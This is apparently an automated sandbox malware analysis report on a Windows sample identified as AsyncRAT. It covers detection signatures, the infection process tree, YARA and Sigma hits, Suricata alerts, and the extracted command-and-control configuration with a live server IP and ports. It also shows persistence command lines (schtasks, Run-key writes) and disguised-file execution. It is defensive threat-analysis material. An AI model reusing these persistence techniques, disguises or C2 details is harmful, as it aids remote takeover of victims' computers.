
Windows Analysis Report
yjOJ1YK5M3.exe

Overview

General Information

Sample name: yjOJ1YK5M3.exe (renamed because the original name is a hash value)
Original sample name: 7B17EBBF77F53472D2FEBB38E9785026.exe
Analysis ID: 1582904
MD5: 7b17ebbf77f53472d2febb38e9785026
SHA1: f3e6e40de8a8ca8b7cc3f8f4d636ad788df39935
SHA256: c23b7950208b8f8e8a22c401cb5e9a05e560ae6119307d975ba601b4e2e99273
Tags: AsyncRAT, exe, RAT, user-abuse_ch

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Autoit Injector
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Double Extension Files
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yjOJ1YK5M3.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yjOJ1YK5M3.exe" MD5: 7B17EBBF77F53472D2FEBB38E9785026)
    • wscript.exe (PID: 7016 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 1852 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1312 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 3940 cmdline: "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cipkucw.ppt (PID: 1420 cmdline: cipkucw.ppt xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7040 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cipkucw.ppt.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 2368 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cipkucw.ppt.exe (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6668 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cipkucw.ppt.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6852 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"Server": "195.26.255.81", "Port": "6606,7707,8808,0077,1996,2106,7777", "Version": "| Edit by Vinom Rat", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "true"}
Yara matches on memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown, Strings:
  • 0xcfa8:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x10258:$a2: Stub.exe
  • 0x102e8:$a2: Stub.exe
  • 0x9724:$a3: get_ActivatePong
  • 0xd1c0:$a4: vmware
  • 0xd038:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0xa747:$a6: get_SslClient
Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen, Strings:
  • 0xd03a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown, Strings:
  • 0xc190:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xf040:$a2: Stub.exe
  • 0xf0d0:$a2: Stub.exe
  • 0x890c:$a3: get_ActivatePong
  • 0xc3a8:$a4: vmware
  • 0xc220:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x992f:$a6: get_SslClient
(68 entries in total; the remaining entries are not shown here)
Yara matches on unpacked PE files (Source, Rule, Description, Author, Strings):
Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown, Strings:
  • 0xd188:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x10038:$a2: Stub.exe
  • 0x100c8:$a2: Stub.exe
  • 0x9904:$a3: get_ActivatePong
  • 0xd3a0:$a4: vmware
  • 0xd218:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0xa927:$a6: get_SslClient
Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, Rule: rat_win_asyncrat, Description: Detect AsyncRAT based on specific strings, Author: Sekoia.io, Strings:
  • 0x9904:$str01: get_ActivatePong
  • 0xa927:$str02: get_SslClient
  • 0xa943:$str03: get_TcpClient
  • 0x8df7:$str04: get_SendSync
  • 0x8ef1:$str05: get_IsConnected
  • 0x962d:$str06: set_UseShellExecute
  • 0xd4ae:$str07: Pastebin
  • 0xeb46:$str08: Select * from AntivirusProduct
  • 0x10038:$str09: Stub.exe
  • 0x100c8:$str09: Stub.exe
  • 0xd298:$str10: timeout 3 > NUL
  • 0xd188:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
  • 0xd218:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen, Strings:
  • 0xd21a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
(40 entries in total; the remaining entries are not shown here)

System Summary

Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7016, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 1852, ProcessName: cmd.exe
Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ProcessId: 3484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ProcessId: 1420, TargetFilename: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ProcessId: 3484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: cipkucw.ppt xdgrnj.pdf, CommandLine: cipkucw.ppt xdgrnj.pdf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3940, ParentProcessName: cmd.exe, ProcessCommandLine: cipkucw.ppt xdgrnj.pdf, ProcessId: 1420, ProcessName: cipkucw.ppt
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: cipkucw.ppt xdgrnj.pdf, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ParentProcessId: 1420, ParentProcessName: cipkucw.ppt, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 2800, ProcessName: RegSvcs.exe
Source: Process started, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, CommandLine: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, ProcessId: 3484, ProcessName: cipkucw.ppt.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yjOJ1YK5M3.exe", ParentImage: C:\Users\user\Desktop\yjOJ1YK5M3.exe, ParentProcessId: 6640, ParentProcessName: yjOJ1YK5M3.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" , ProcessId: 7016, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, ProcessId: 1420, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Suricata IDS alerts (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol):
Timestamp: 2024-12-31T20:26:35.833177+0100, SID: 2035595, Severity: 1, Classtype: Domain Observed Used for C2 Detected, Source IP: 195.26.255.81, Source Port: 2106, Destination IP: 192.168.2.4, Destination Port: 49737, Protocol: TCP
Timestamp: 2024-12-31T20:26:35.833177+0100, SID: 2035607, Severity: 1, Classtype: Domain Observed Used for C2 Detected, Source IP: 195.26.255.81, Source Port: 2106, Destination IP: 192.168.2.4, Destination Port: 49737, Protocol: TCP
Timestamp: 2024-12-31T20:26:35.833177+0100, SID: 2842478, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 195.26.255.81, Source Port: 2106, Destination IP: 192.168.2.4, Destination Port: 49737, Protocol: TCP

AV Detection

Source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: AsyncRAT {"Server": "195.26.255.81", "Port": "6606,7707,8808,0077,1996,2106,7777", "Version": "| Edit by Vinom Rat", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "true"}
Source: yjOJ1YK5M3.exe, ReversingLabs: Detection: 62%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.7% probability
Source: yjOJ1YK5M3.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: yjOJ1YK5M3.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yjOJ1YK5M3.exe
          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdB source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe, Code function: 0_2_0027F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027F826
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe, Code function: 0_2_00291630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00291630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_0075E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0075E387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_0075D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075D836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_0075DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075DB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_00769F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00769F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_0076A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0076A0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_0076A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_0076A488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_007665F1 FindFirstFileW,FindNextFileW,FindClose,6_2_007665F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_00767248 FindFirstFileW,FindClose,6_2_00767248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Code function: 6_2_007672E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_007672E9
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_0102E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0102E387
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_0102D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102D836
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_0102DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102DB69
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_01039F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_01039F9F
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_0103A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0103A0FA
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_010365F1 FindFirstFileW,FindNextFileW,FindClose,15_2_010365F1
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_0103A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0103A488
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_01037248 FindFirstFileW,FindClose,15_2_01037248
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Code function: 15_2_010372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_010372E9

Networking

Source: Network traffic, Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 195.26.255.81:2106 -> 192.168.2.4:49737
Source: Network traffic, Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 195.26.255.81:2106 -> 192.168.2.4:49737
Source: Network traffic, Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 195.26.255.81:2106 -> 192.168.2.4:49737
Source: Network traffic, Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 195.26.255.81:2106 -> 192.168.2.4:49737
Source: Yara match, File source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.4:49737 -> 195.26.255.81:2106
Source: Joe Sandbox View, ASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB
Source: unknown, TCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
